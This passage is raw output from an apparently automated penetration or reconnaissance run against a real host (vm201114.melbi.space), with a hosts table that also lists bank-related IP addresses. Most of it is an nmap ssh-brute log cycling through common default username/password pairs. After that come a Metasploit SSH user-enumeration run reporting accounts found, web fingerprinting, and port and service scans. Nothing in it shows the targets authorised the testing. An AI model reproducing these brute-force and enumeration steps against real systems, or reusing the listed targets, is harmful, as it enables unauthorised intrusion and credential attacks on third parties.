2649NSE: [ssh-brute] Trying username/password pair: admin:
2650NSE: [ssh-brute] Trying username/password pair: administrator:
2651NSE: [ssh-brute] Trying username/password pair: webadmin:
2652NSE: [ssh-brute] Trying username/password pair: sysadmin:
2653NSE: [ssh-brute] Trying username/password pair: netadmin:
2654NSE: [ssh-brute] Trying username/password pair: guest:
2655NSE: [ssh-brute] Trying username/password pair: user:
2656NSE: [ssh-brute] Trying username/password pair: web:
2657NSE: [ssh-brute] Trying username/password pair: test:
2658NSE: [ssh-brute] Trying username/password pair: root:123456
2659NSE: [ssh-brute] Trying username/password pair: admin:123456
2660NSE: [ssh-brute] Trying username/password pair: administrator:123456
2661NSE: [ssh-brute] Trying username/password pair: webadmin:123456
2662NSE: [ssh-brute] Trying username/password pair: sysadmin:123456
2663NSE: [ssh-brute] Trying username/password pair: netadmin:123456
2664NSE: [ssh-brute] Trying username/password pair: guest:123456
2665NSE: [ssh-brute] Trying username/password pair: user:123456
2666NSE: [ssh-brute] Trying username/password pair: web:123456
2667NSE: [ssh-brute] Trying username/password pair: test:123456
2668NSE: [ssh-brute] Trying username/password pair: root:12345
2669NSE: [ssh-brute] Trying username/password pair: admin:12345
2670NSE: [ssh-brute] Trying username/password pair: administrator:12345
2671NSE: [ssh-brute] Trying username/password pair: webadmin:12345
2672NSE: [ssh-brute] Trying username/password pair: sysadmin:12345
2673NSE: [ssh-brute] Trying username/password pair: netadmin:12345
2674NSE: [ssh-brute] Trying username/password pair: guest:12345
2675NSE: [ssh-brute] Trying username/password pair: user:12345
2676NSE: [ssh-brute] Trying username/password pair: web:12345
2677NSE: [ssh-brute] Trying username/password pair: test:12345
2678NSE: [ssh-brute] Trying username/password pair: root:123456789
2679NSE: [ssh-brute] Trying username/password pair: admin:123456789
2680NSE: [ssh-brute] Trying username/password pair: administrator:123456789
2681NSE: [ssh-brute] Trying username/password pair: webadmin:123456789
2682NSE: [ssh-brute] Trying username/password pair: sysadmin:123456789
2683NSE: [ssh-brute] Trying username/password pair: netadmin:123456789
2684NSE: [ssh-brute] Trying username/password pair: guest:123456789
2685NSE: [ssh-brute] Trying username/password pair: user:123456789
2686NSE: [ssh-brute] Trying username/password pair: web:123456789
2687NSE: [ssh-brute] Trying username/password pair: test:123456789
2688NSE: [ssh-brute] Trying username/password pair: root:password
2689NSE: [ssh-brute] Trying username/password pair: admin:password
2690NSE: [ssh-brute] Trying username/password pair: administrator:password
2691NSE: [ssh-brute] Trying username/password pair: webadmin:password
2692NSE: [ssh-brute] Trying username/password pair: sysadmin:password
2693NSE: [ssh-brute] Trying username/password pair: netadmin:password
2694NSE: [ssh-brute] Trying username/password pair: guest:password
2695NSE: [ssh-brute] Trying username/password pair: user:password
2696NSE: [ssh-brute] Trying username/password pair: web:password
2697NSE: [ssh-brute] Trying username/password pair: test:password
2698NSE: [ssh-brute] Trying username/password pair: root:iloveyou
2699NSE: [ssh-brute] Trying username/password pair: admin:iloveyou
2700NSE: [ssh-brute] Trying username/password pair: administrator:iloveyou
2701NSE: [ssh-brute] Trying username/password pair: webadmin:iloveyou
2702NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveyou
2703NSE: [ssh-brute] Trying username/password pair: netadmin:iloveyou
2704NSE: [ssh-brute] Trying username/password pair: guest:iloveyou
2705NSE: [ssh-brute] Trying username/password pair: user:iloveyou
2706NSE: [ssh-brute] Trying username/password pair: web:iloveyou
2707NSE: [ssh-brute] Trying username/password pair: test:iloveyou
2708NSE: [ssh-brute] Trying username/password pair: root:princess
2709NSE: [ssh-brute] Trying username/password pair: admin:princess
2710NSE: [ssh-brute] Trying username/password pair: administrator:princess
2711NSE: [ssh-brute] Trying username/password pair: webadmin:princess
2712NSE: [ssh-brute] Trying username/password pair: sysadmin:princess
2713NSE: [ssh-brute] Trying username/password pair: netadmin:princess
2714NSE: [ssh-brute] Trying username/password pair: guest:princess
2715NSE: [ssh-brute] Trying username/password pair: user:princess
2716NSE: [ssh-brute] Trying username/password pair: web:princess
2717NSE: [ssh-brute] Trying username/password pair: test:princess
2718NSE: [ssh-brute] Trying username/password pair: root:12345678
2719NSE: [ssh-brute] Trying username/password pair: admin:12345678
2720NSE: [ssh-brute] Trying username/password pair: administrator:12345678
2721NSE: [ssh-brute] Trying username/password pair: webadmin:12345678
2722NSE: [ssh-brute] Trying username/password pair: sysadmin:12345678
2723NSE: [ssh-brute] Trying username/password pair: netadmin:12345678
2724NSE: [ssh-brute] Trying username/password pair: guest:12345678
2725NSE: [ssh-brute] Trying username/password pair: user:12345678
2726NSE: [ssh-brute] Trying username/password pair: web:12345678
2727NSE: [ssh-brute] Trying username/password pair: test:12345678
2728NSE: [ssh-brute] Trying username/password pair: root:1234567
2729NSE: [ssh-brute] Trying username/password pair: admin:1234567
2730NSE: [ssh-brute] Trying username/password pair: administrator:1234567
2731NSE: [ssh-brute] Trying username/password pair: webadmin:1234567
2732NSE: [ssh-brute] Trying username/password pair: sysadmin:1234567
2733NSE: [ssh-brute] Trying username/password pair: netadmin:1234567
2734NSE: [ssh-brute] Trying username/password pair: guest:1234567
2735NSE: [ssh-brute] Trying username/password pair: user:1234567
2736NSE: [ssh-brute] Trying username/password pair: web:1234567
2737NSE: [ssh-brute] Trying username/password pair: test:1234567
2738NSE: [ssh-brute] Trying username/password pair: root:abc123
2739NSE: [ssh-brute] Trying username/password pair: admin:abc123
2740NSE: [ssh-brute] Trying username/password pair: administrator:abc123
2741NSE: [ssh-brute] Trying username/password pair: webadmin:abc123
2742NSE: [ssh-brute] Trying username/password pair: sysadmin:abc123
2743NSE: [ssh-brute] Trying username/password pair: netadmin:abc123
2744NSE: [ssh-brute] Trying username/password pair: guest:abc123
2745NSE: [ssh-brute] Trying username/password pair: user:abc123
2746NSE: [ssh-brute] Trying username/password pair: web:abc123
2747NSE: [ssh-brute] Trying username/password pair: test:abc123
2748NSE: [ssh-brute] Trying username/password pair: root:nicole
2749NSE: [ssh-brute] Trying username/password pair: admin:nicole
2750NSE: [ssh-brute] Trying username/password pair: administrator:nicole
2751NSE: [ssh-brute] Trying username/password pair: webadmin:nicole
2752NSE: [ssh-brute] Trying username/password pair: sysadmin:nicole
2753NSE: [ssh-brute] Trying username/password pair: netadmin:nicole
2754NSE: [ssh-brute] Trying username/password pair: guest:nicole
2755NSE: [ssh-brute] Trying username/password pair: user:nicole
2756NSE: [ssh-brute] Trying username/password pair: web:nicole
2757NSE: [ssh-brute] Trying username/password pair: test:nicole
2758NSE: [ssh-brute] Trying username/password pair: root:daniel
2759NSE: [ssh-brute] Trying username/password pair: admin:daniel
2760NSE: [ssh-brute] Trying username/password pair: administrator:daniel
2761NSE: [ssh-brute] Trying username/password pair: webadmin:daniel
2762NSE: [ssh-brute] Trying username/password pair: sysadmin:daniel
2763NSE: [ssh-brute] Trying username/password pair: netadmin:daniel
2764NSE: [ssh-brute] Trying username/password pair: guest:daniel
2765NSE: [ssh-brute] Trying username/password pair: user:daniel
2766NSE: [ssh-brute] Trying username/password pair: web:daniel
2767NSE: [ssh-brute] Trying username/password pair: test:daniel
2768NSE: [ssh-brute] Trying username/password pair: root:monkey
2769NSE: [ssh-brute] Trying username/password pair: admin:monkey
2770NSE: [ssh-brute] Trying username/password pair: administrator:monkey
2771NSE: [ssh-brute] Trying username/password pair: webadmin:monkey
2772NSE: [ssh-brute] Trying username/password pair: sysadmin:monkey
2773NSE: [ssh-brute] Trying username/password pair: netadmin:monkey
2774NSE: [ssh-brute] Trying username/password pair: guest:monkey
2775NSE: [ssh-brute] Trying username/password pair: user:monkey
2776NSE: [ssh-brute] Trying username/password pair: web:monkey
2777NSE: [ssh-brute] Trying username/password pair: test:monkey
2778NSE: [ssh-brute] Trying username/password pair: root:babygirl
2779NSE: [ssh-brute] Trying username/password pair: admin:babygirl
2780NSE: [ssh-brute] Trying username/password pair: administrator:babygirl
2781NSE: [ssh-brute] Trying username/password pair: webadmin:babygirl
2782NSE: [ssh-brute] Trying username/password pair: sysadmin:babygirl
2783NSE: [ssh-brute] Trying username/password pair: netadmin:babygirl
2784NSE: [ssh-brute] Trying username/password pair: guest:babygirl
2785NSE: [ssh-brute] Trying username/password pair: user:babygirl
2786NSE: [ssh-brute] Trying username/password pair: web:babygirl
2787NSE: [ssh-brute] Trying username/password pair: test:babygirl
2788NSE: [ssh-brute] Trying username/password pair: root:qwerty
2789NSE: [ssh-brute] Trying username/password pair: admin:qwerty
2790NSE: [ssh-brute] Trying username/password pair: administrator:qwerty
2791NSE: [ssh-brute] Trying username/password pair: webadmin:qwerty
2792NSE: [ssh-brute] Trying username/password pair: sysadmin:qwerty
2793NSE: [ssh-brute] Trying username/password pair: netadmin:qwerty
2794NSE: [ssh-brute] Trying username/password pair: guest:qwerty
2795NSE: [ssh-brute] Trying username/password pair: user:qwerty
2796NSE: [ssh-brute] Trying username/password pair: web:qwerty
2797NSE: [ssh-brute] Trying username/password pair: test:qwerty
2798NSE: [ssh-brute] Trying username/password pair: root:lovely
2799NSE: [ssh-brute] Trying username/password pair: admin:lovely
2800NSE: [ssh-brute] Trying username/password pair: administrator:lovely
2801NSE: [ssh-brute] Trying username/password pair: webadmin:lovely
2802NSE: [ssh-brute] Trying username/password pair: sysadmin:lovely
2803NSE: [ssh-brute] Trying username/password pair: netadmin:lovely
2804NSE: [ssh-brute] Trying username/password pair: guest:lovely
2805NSE: [ssh-brute] Trying username/password pair: user:lovely
2806NSE: [ssh-brute] Trying username/password pair: web:lovely
2807NSE: [ssh-brute] Trying username/password pair: test:lovely
2808NSE: [ssh-brute] Trying username/password pair: root:654321
2809NSE: [ssh-brute] Trying username/password pair: admin:654321
2810NSE: [ssh-brute] Trying username/password pair: administrator:654321
2811NSE: [ssh-brute] Trying username/password pair: webadmin:654321
2812NSE: [ssh-brute] Trying username/password pair: sysadmin:654321
2813NSE: [ssh-brute] Trying username/password pair: netadmin:654321
2814NSE: [ssh-brute] Trying username/password pair: guest:654321
2815NSE: [ssh-brute] Trying username/password pair: user:654321
2816NSE: [ssh-brute] Trying username/password pair: web:654321
2817NSE: [ssh-brute] Trying username/password pair: test:654321
2818NSE: [ssh-brute] Trying username/password pair: root:michael
2819NSE: [ssh-brute] Trying username/password pair: admin:michael
2820NSE: [ssh-brute] Trying username/password pair: administrator:michael
2821NSE: [ssh-brute] Trying username/password pair: webadmin:michael
2822NSE: [ssh-brute] Trying username/password pair: sysadmin:michael
2823NSE: [ssh-brute] Trying username/password pair: netadmin:michael
2824NSE: [ssh-brute] Trying username/password pair: guest:michael
2825NSE: [ssh-brute] Trying username/password pair: user:michael
2826NSE: [ssh-brute] Trying username/password pair: web:michael
2827NSE: [ssh-brute] Trying username/password pair: test:michael
2828NSE: [ssh-brute] Trying username/password pair: root:jessica
2829NSE: [ssh-brute] Trying username/password pair: admin:jessica
2830NSE: [ssh-brute] Trying username/password pair: administrator:jessica
2831NSE: [ssh-brute] Trying username/password pair: webadmin:jessica
2832NSE: [ssh-brute] Trying username/password pair: sysadmin:jessica
2833NSE: [ssh-brute] Trying username/password pair: netadmin:jessica
2834NSE: [ssh-brute] Trying username/password pair: guest:jessica
2835NSE: [ssh-brute] Trying username/password pair: user:jessica
2836NSE: [ssh-brute] Trying username/password pair: web:jessica
2837NSE: [ssh-brute] Trying username/password pair: test:jessica
2838NSE: [ssh-brute] Trying username/password pair: root:111111
2839NSE: [ssh-brute] Trying username/password pair: admin:111111
2840NSE: [ssh-brute] Trying username/password pair: administrator:111111
2841NSE: [ssh-brute] Trying username/password pair: webadmin:111111
2842NSE: [ssh-brute] Trying username/password pair: sysadmin:111111
2843NSE: [ssh-brute] Trying username/password pair: netadmin:111111
2844NSE: [ssh-brute] Trying username/password pair: guest:111111
2845NSE: [ssh-brute] Trying username/password pair: user:111111
2846NSE: [ssh-brute] Trying username/password pair: web:111111
2847NSE: [ssh-brute] Trying username/password pair: test:111111
2848NSE: [ssh-brute] Trying username/password pair: root:ashley
2849NSE: [ssh-brute] Trying username/password pair: admin:ashley
2850NSE: [ssh-brute] Trying username/password pair: administrator:ashley
2851NSE: [ssh-brute] Trying username/password pair: webadmin:ashley
2852NSE: [ssh-brute] Trying username/password pair: sysadmin:ashley
2853NSE: [ssh-brute] Trying username/password pair: netadmin:ashley
2854NSE: [ssh-brute] Trying username/password pair: guest:ashley
2855NSE: [ssh-brute] Trying username/password pair: user:ashley
2856NSE: [ssh-brute] Trying username/password pair: web:ashley
2857NSE: [ssh-brute] Trying username/password pair: test:ashley
2858NSE: [ssh-brute] Trying username/password pair: root:000000
2859NSE: [ssh-brute] Trying username/password pair: admin:000000
2860NSE: [ssh-brute] Trying username/password pair: administrator:000000
2861NSE: [ssh-brute] Trying username/password pair: webadmin:000000
2862NSE: [ssh-brute] Trying username/password pair: sysadmin:000000
2863NSE: [ssh-brute] Trying username/password pair: netadmin:000000
2864NSE: [ssh-brute] Trying username/password pair: guest:000000
2865NSE: [ssh-brute] Trying username/password pair: user:000000
2866NSE: [ssh-brute] Trying username/password pair: web:000000
2867NSE: [ssh-brute] Trying username/password pair: test:000000
2868NSE: [ssh-brute] Trying username/password pair: root:iloveu
2869NSE: [ssh-brute] Trying username/password pair: admin:iloveu
2870NSE: [ssh-brute] Trying username/password pair: administrator:iloveu
2871NSE: [ssh-brute] Trying username/password pair: webadmin:iloveu
2872NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveu
2873NSE: [ssh-brute] Trying username/password pair: netadmin:iloveu
2874NSE: [ssh-brute] Trying username/password pair: guest:iloveu
2875NSE: [ssh-brute] Trying username/password pair: user:iloveu
2876NSE: [ssh-brute] Trying username/password pair: web:iloveu
2877NSE: [ssh-brute] Trying username/password pair: test:iloveu
2878NSE: [ssh-brute] Trying username/password pair: root:michelle
2879NSE: [ssh-brute] Trying username/password pair: admin:michelle
2880NSE: [ssh-brute] Trying username/password pair: administrator:michelle
2881NSE: [ssh-brute] Trying username/password pair: webadmin:michelle
2882NSE: [ssh-brute] Trying username/password pair: sysadmin:michelle
2883NSE: [ssh-brute] Trying username/password pair: netadmin:michelle
2884NSE: [ssh-brute] Trying username/password pair: guest:michelle
2885NSE: [ssh-brute] Trying username/password pair: user:michelle
2886NSE: [ssh-brute] Trying username/password pair: web:michelle
2887NSE: [ssh-brute] Trying username/password pair: test:michelle
2888NSE: [ssh-brute] Trying username/password pair: root:tigger
2889NSE: [ssh-brute] Trying username/password pair: admin:tigger
2890NSE: [ssh-brute] Trying username/password pair: administrator:tigger
2891NSE: [ssh-brute] Trying username/password pair: webadmin:tigger
2892NSE: [ssh-brute] Trying username/password pair: sysadmin:tigger
2893NSE: [ssh-brute] Trying username/password pair: netadmin:tigger
2894NSE: [ssh-brute] Trying username/password pair: guest:tigger
2895NSE: [ssh-brute] Trying username/password pair: user:tigger
2896NSE: [ssh-brute] Trying username/password pair: web:tigger
2897NSE: [ssh-brute] Trying username/password pair: test:tigger
2898NSE: [ssh-brute] Trying username/password pair: root:sunshine
2899NSE: [ssh-brute] Trying username/password pair: admin:sunshine
2900NSE: [ssh-brute] Trying username/password pair: administrator:sunshine
2901NSE: [ssh-brute] Trying username/password pair: webadmin:sunshine
2902NSE: [ssh-brute] Trying username/password pair: sysadmin:sunshine
2903NSE: [ssh-brute] Trying username/password pair: netadmin:sunshine
2904NSE: [ssh-brute] Trying username/password pair: guest:sunshine
2905NSE: [ssh-brute] Trying username/password pair: user:sunshine
2906NSE: [ssh-brute] Trying username/password pair: web:sunshine
2907NSE: [ssh-brute] Trying username/password pair: test:sunshine
2908NSE: [ssh-brute] Trying username/password pair: root:chocolate
2909NSE: [ssh-brute] Trying username/password pair: admin:chocolate
2910NSE: [ssh-brute] Trying username/password pair: administrator:chocolate
2911NSE: [ssh-brute] Trying username/password pair: webadmin:chocolate
2912NSE: [ssh-brute] Trying username/password pair: sysadmin:chocolate
2913NSE: [ssh-brute] Trying username/password pair: netadmin:chocolate
2914NSE: [ssh-brute] Trying username/password pair: guest:chocolate
2915NSE: [ssh-brute] Trying username/password pair: user:chocolate
2916NSE: [ssh-brute] Trying username/password pair: web:chocolate
2917NSE: [ssh-brute] Trying username/password pair: test:chocolate
2918NSE: [ssh-brute] Trying username/password pair: root:password1
2919NSE: [ssh-brute] Trying username/password pair: admin:password1
2920NSE: [ssh-brute] Trying username/password pair: administrator:password1
2921NSE: [ssh-brute] Trying username/password pair: webadmin:password1
2922NSE: [ssh-brute] Trying username/password pair: sysadmin:password1
2923NSE: [ssh-brute] Trying username/password pair: netadmin:password1
2924NSE: [ssh-brute] Trying username/password pair: guest:password1
2925NSE: [ssh-brute] Trying username/password pair: user:password1
2926NSE: [ssh-brute] Trying username/password pair: web:password1
2927NSE: [ssh-brute] Trying username/password pair: test:password1
2928NSE: [ssh-brute] Trying username/password pair: root:soccer
2929NSE: [ssh-brute] Trying username/password pair: admin:soccer
2930NSE: [ssh-brute] Trying username/password pair: administrator:soccer
2931NSE: [ssh-brute] Trying username/password pair: webadmin:soccer
2932NSE: [ssh-brute] Trying username/password pair: sysadmin:soccer
2933NSE: [ssh-brute] Trying username/password pair: netadmin:soccer
2934NSE: [ssh-brute] Trying username/password pair: guest:soccer
2935NSE: [ssh-brute] Trying username/password pair: user:soccer
2936NSE: [ssh-brute] Trying username/password pair: web:soccer
2937NSE: [ssh-brute] Trying username/password pair: test:soccer
2938NSE: [ssh-brute] Trying username/password pair: root:anthony
2939NSE: [ssh-brute] Trying username/password pair: admin:anthony
2940NSE: [ssh-brute] Trying username/password pair: administrator:anthony
2941NSE: [ssh-brute] Trying username/password pair: webadmin:anthony
2942NSE: [ssh-brute] Trying username/password pair: sysadmin:anthony
2943NSE: [ssh-brute] Trying username/password pair: netadmin:anthony
2944NSE: [ssh-brute] Trying username/password pair: guest:anthony
2945NSE: [ssh-brute] Trying username/password pair: user:anthony
2946NSE: [ssh-brute] Trying username/password pair: web:anthony
2947NSE: [ssh-brute] Trying username/password pair: test:anthony
2948NSE: [ssh-brute] Trying username/password pair: root:friends
2949NSE: [ssh-brute] Trying username/password pair: admin:friends
2950NSE: [ssh-brute] Trying username/password pair: administrator:friends
2951NSE: [ssh-brute] Trying username/password pair: webadmin:friends
2952NSE: [ssh-brute] Trying username/password pair: sysadmin:friends
2953NSE: [ssh-brute] Trying username/password pair: netadmin:friends
2954NSE: [ssh-brute] Trying username/password pair: guest:friends
2955NSE: [ssh-brute] Trying username/password pair: user:friends
2956NSE: [ssh-brute] usernames: Time limit 3m00s exceeded.
2957NSE: [ssh-brute] usernames: Time limit 3m00s exceeded.
2958NSE: [ssh-brute] passwords: Time limit 3m00s exceeded.
2959Nmap scan report for vm201114.melbi.space (213.183.63.253)
2960Host is up (0.14s latency).
2961
2962PORT STATE SERVICE VERSION
296322/tcp open ssh OpenSSH 7.4 (protocol 2.0)
2964| ssh-auth-methods:
2965| Supported authentication methods:
2966| publickey
2967| gssapi-keyex
2968| gssapi-with-mic
2969|_ password
2970| ssh-brute:
2971| Accounts: No valid accounts found
2972|_ Statistics: Performed 318 guesses in 181 seconds, average tps: 2.0
2973| ssh-hostkey:
2974| 2048 da:20:da:dc:dc:03:2f:f4:fb:d3:39:f7:37:7b:e6:80 (RSA)
2975| 256 a3:35:91:92:60:07:1b:af:a5:b6:e5:46:a0:59:bc:c0 (ECDSA)
2976|_ 256 15:41:a5:a8:39:b9:62:a4:b9:93:28:ff:67:5f:b8:32 (ED25519)
2977| ssh-publickey-acceptance:
2978|_ Accepted Public Keys: No public keys accepted
2979|_ssh-run: Failed to specify credentials and command to run.
2980Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
2981Aggressive OS guesses: Linux 3.10 - 4.11 (95%), Linux 3.2 - 4.9 (95%), Linux 3.16 (95%), ASUS RT-N56U WAP (Linux 3.4) (94%), Linux 3.1 (94%), Linux 3.2 (94%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.18 (93%), HP P2000 G3 NAS device (93%), Oracle VM Server 3.4.2 (Linux 4.1) (92%)
2982No exact OS matches for host (test conditions non-ideal).
2983Network Distance: 8 hops
2984
2985TRACEROUTE (using port 22/tcp)
2986HOP RTT ADDRESS
29871 104.32 ms 10.203.14.1
29882 632.39 ms 45.131.5.2
29893 104.36 ms 109.236.95.228
29904 105.52 ms 109.236.95.167
29915 105.55 ms 195.22.213.126
29926 159.26 ms ae10.sofia1.sof.seabone.net (195.22.211.209)
29937 135.90 ms melbikomas.sofia1.sof.seabone.net (89.221.39.27)
29948 145.89 ms vm201114.melbi.space (213.183.63.253)
2995######################################################################################################################
2996USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
2997RHOSTS => 213.183.63.253
2998RHOST => 213.183.63.253
2999[*] 213.183.63.253:22 - SSH - Using malformed packet technique
3000[*] 213.183.63.253:22 - SSH - Starting scan
3001[+] 213.183.63.253:22 - SSH - User 'admin' found
3002[+] 213.183.63.253:22 - SSH - User 'administrator' found
3003[+] 213.183.63.253:22 - SSH - User 'anonymous' found
3004[+] 213.183.63.253:22 - SSH - User 'backup' found
3005[+] 213.183.63.253:22 - SSH - User 'bee' found
3006[+] 213.183.63.253:22 - SSH - User 'ftp' found
3007[+] 213.183.63.253:22 - SSH - User 'guest' found
3008[+] 213.183.63.253:22 - SSH - User 'GUEST' found
3009[+] 213.183.63.253:22 - SSH - User 'info' found
3010[+] 213.183.63.253:22 - SSH - User 'mail' found
3011[+] 213.183.63.253:22 - SSH - User 'mailadmin' found
3012[+] 213.183.63.253:22 - SSH - User 'msfadmin' found
3013[+] 213.183.63.253:22 - SSH - User 'mysql' found
3014[-] 213.183.63.253:22 - SSH - User 'nobody' not found
3015[+] 213.183.63.253:22 - SSH - User 'oracle' found
3016[*] Scanned 1 of 1 hosts (100% complete)
3017[*] Auxiliary module execution completed
3018#####################################################################################################################
3019Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-31 18:19 EDT
3020Nmap scan report for vm201114.melbi.space (213.183.63.253)
3021Host is up (0.13s latency).
3022
3023PORT STATE SERVICE VERSION
302468/tcp closed dhcpc
302568/udp closed dhcpc
3026Too many fingerprints match this host to give specific OS details
3027Network Distance: 8 hops
3028
3029TRACEROUTE (using port 68/tcp)
3030HOP RTT ADDRESS
30311 109.60 ms 10.203.14.1
30322 109.65 ms 45.131.5.3
30333 100.88 ms 109.236.95.230
30344 101.71 ms 109.236.95.173
30355 101.76 ms 195.22.213.126
30366 155.53 ms ae10.sofia1.sof.seabone.net (195.22.211.209)
30377 132.64 ms melbikomas.sofia1.sof.seabone.net (89.221.39.27)
30388 133.26 ms vm201114.melbi.space (213.183.63.253)
3039######################################################################################################################
3040
3041wig - WebApp Information Gatherer
3042
3043
3044Scanning http://213.183.63.253...
3045_________________________________________ SITE INFO _________________________________________
3046IP Title
3047213.183.63.253 Shared IP
3048
3049__________________________________________ VERSION __________________________________________
3050Name Versions Type
3051Roundcube CMS
3052Apache 2.4.10 | 2.4.11 | 2.4.12 | 2.4.5 | 2.4.6 | 2.4.7 | 2.4.8 Platform
3053 2.4.9
3054PHP 5.6.40 Platform
3055nginx 1.16.1 Platform
3056
3057_____________________________________________________________________________________________
3058Time: 19.2 sec Urls: 387 Fingerprints: 40401
3059######################################################################################################################
3060HTTP/1.1 200 OK
3061Server: nginx/1.16.1
3062Date: Tue, 31 Mar 2020 22:19:58 GMT
3063Content-Type: text/html
3064Content-Length: 244
3065Connection: keep-alive
3066Upgrade: h2,h2c
3067Last-Modified: Wed, 04 Mar 2020 18:21:58 GMT
3068ETag: "f4-5a00b7ef1adb0"
3069Accept-Ranges: bytes
3070Vary: Accept-Encoding,User-Agent
3071
3072HTTP/1.1 200 OK
3073Server: nginx/1.16.1
3074Date: Tue, 31 Mar 2020 22:19:58 GMT
3075Content-Type: text/html
3076Content-Length: 244
3077Connection: keep-alive
3078Upgrade: h2,h2c
3079Last-Modified: Wed, 04 Mar 2020 18:21:58 GMT
3080ETag: "f4-5a00b7ef1adb0"
3081Accept-Ranges: bytes
3082Vary: Accept-Encoding,User-Agent
3083######################################################################################################################
3084Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-31 18:20 EDT
3085Nmap scan report for vm201114.melbi.space (213.183.63.253)
3086Host is up (0.14s latency).
3087Not shown: 65525 closed ports
3088PORT STATE SERVICE VERSION
308922/tcp open ssh OpenSSH 7.4 (protocol 2.0)
3090| ssh-hostkey:
3091| 2048 da:20:da:dc:dc:03:2f:f4:fb:d3:39:f7:37:7b:e6:80 (RSA)
3092| 256 a3:35:91:92:60:07:1b:af:a5:b6:e5:46:a0:59:bc:c0 (ECDSA)
3093|_ 256 15:41:a5:a8:39:b9:62:a4:b9:93:28:ff:67:5f:b8:32 (ED25519)
309480/tcp open http nginx 1.16.1
3095|_http-server-header: nginx/1.16.1
3096|_http-title: Shared IP
3097135/tcp filtered msrpc
3098136/tcp filtered profile
3099137/tcp filtered netbios-ns
3100138/tcp filtered netbios-dgm
3101139/tcp filtered netbios-ssn
3102445/tcp filtered microsoft-ds
31034145/tcp filtered vvr-control
310411211/tcp filtered memcache
3105Aggressive OS guesses: Linux 3.10 - 4.11 (95%), Linux 3.18 (93%), Linux 3.2 - 4.9 (93%), Linux 3.16 (92%), OpenWrt Kamikaze 7.09 (Linux 2.6.22) (92%), HP P2000 G3 NAS device (91%), Linux 3.13 (91%), Linux 3.13 or 4.2 (91%), Linux 4.10 (91%), Linux 4.2 (91%)
3106No exact OS matches for host (test conditions non-ideal).
3107Network Distance: 8 hops
3108
3109TRACEROUTE (using port 1723/tcp)
3110HOP RTT ADDRESS
31111 104.71 ms 10.203.14.1
31122 104.76 ms 45.131.5.2
31133 104.79 ms 109.236.95.230
31144 106.05 ms 109.236.95.173
31155 102.16 ms 195.22.213.126
31166 155.30 ms ae10.sofia1.sof.seabone.net (195.22.211.209)
31177 132.94 ms melbikomas.sofia1.sof.seabone.net (89.221.39.27)
31188 143.14 ms vm201114.melbi.space (213.183.63.253)
3119######################################################################################################################
3120Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-31 18:23 EDT
3121Warning: 213.183.63.253 giving up on port because retransmission cap hit (2).
3122Nmap scan report for vm201114.melbi.space (213.183.63.253)
3123Host is up (0.14s latency).
3124
3125PORT STATE SERVICE VERSION
312653/tcp closed domain
312767/tcp closed dhcps
312868/tcp closed dhcpc
312969/tcp closed tftp
313088/tcp closed kerberos-sec
3131123/tcp closed ntp
3132137/tcp filtered netbios-ns
3133138/tcp filtered netbios-dgm
3134139/tcp filtered netbios-ssn
3135161/tcp closed snmp
3136162/tcp closed snmptrap
3137389/tcp closed ldap
3138520/tcp closed efs
31392049/tcp closed nfs
314053/udp open|filtered domain
314167/udp closed dhcps
314268/udp open|filtered dhcpc
314369/udp open|filtered tftp
314488/udp closed kerberos-sec
3145123/udp closed ntp
3146137/udp open|filtered netbios-ns
3147138/udp open|filtered netbios-dgm
3148139/udp open|filtered netbios-ssn
3149161/udp open|filtered snmp
3150162/udp open|filtered snmptrap
3151389/udp open|filtered ldap
3152520/udp closed route
31532049/udp open|filtered nfs
3154Too many fingerprints match this host to give specific OS details
3155Network Distance: 8 hops
3156
3157TRACEROUTE (using port 68/tcp)
3158HOP RTT ADDRESS
31591 103.71 ms 10.203.14.1
31602 103.81 ms 45.131.5.2
31613 103.79 ms 109.236.95.226
31624 104.78 ms 109.236.95.167
31635 104.86 ms 195.22.213.126
31646 159.12 ms ae11.sofia1.sof.seabone.net (195.22.211.211)
31657 135.15 ms melbikomas.sofia1.sof.seabone.net (89.221.39.27)
31668 131.99 ms vm201114.melbi.space (213.183.63.253)
3167######################################################################################################################
3168Hosts
3169=====
3170
3171address mac name os_name os_flavor os_sp purpose info comments
3172------- --- ---- ------- --------- ----- ------- ---- --------
317323.62.115.113 a23-62-115-113.deploy.static.akamaitechnologies.com Linux 4.X server
317423.62.121.49 a23-62-121-49.deploy.static.akamaitechnologies.com Linux 4.X server
317523.100.15.180 Unknown device
317652.52.234.222 ec2-52-52-234-222.us-west-1.compute.amazonaws.com embedded device
317780.169.89.102 Linux 2.6.X server
317891.211.89.189 embedded device
317993.174.93.84 Linux 3.X server
318094.140.114.104 Linux 3.X server
3181104.87.36.73 a104-87-36-73.deploy.static.akamaitechnologies.com Unknown device
3182155.136.13.18 Unknown device
3183190.94.188.40 Unknown device
3184190.94.188.59 Unknown device
3185198.41.44.129 Unknown device
3186201.148.104.59 hcenter10459.dedicados.cl Unknown device
3187213.183.63.253 vm201114.melbi.space Linux 3.X server
3188217.148.69.93 217-148-69-93.lacaixa.com Unknown device
3189217.148.69.235 caixabank.com Unknown device
3190217.148.71.93 217-148-71-93.lacaixa.com Unknown device
3191217.148.71.235 caixabank.com Unknown device
3192######################################################################################################################
3193Services
3194========
3195
3196host port proto name state info
3197---- ---- ----- ---- ----- ----
319823.62.115.113 53 tcp domain filtered
319923.62.115.113 53 udp domain unknown
320023.62.115.113 67 tcp dhcps filtered
320123.62.115.113 67 udp dhcps unknown
320223.62.115.113 68 tcp dhcpc filtered
320323.62.115.113 68 udp dhcpc unknown
320423.62.115.113 69 tcp tftp filtered
320523.62.115.113 69 udp tftp unknown
320623.62.115.113 80 tcp http open AkamaiGHost Akamai's HTTP Acceleration/Mirror service
320723.62.115.113 88 tcp kerberos-sec filtered
320823.62.115.113 88 udp kerberos-sec unknown
320923.62.115.113 123 tcp ntp filtered
321023.62.115.113 123 udp ntp unknown
321123.62.115.113 137 tcp netbios-ns filtered
321223.62.115.113 137 udp netbios-ns unknown
321323.62.115.113 138 tcp netbios-dgm filtered
321423.62.115.113 138 udp netbios-dgm unknown
321523.62.115.113 139 tcp netbios-ssn filtered
321623.62.115.113 139 udp netbios-ssn unknown
321723.62.115.113 161 tcp snmp filtered
321823.62.115.113 161 udp snmp unknown
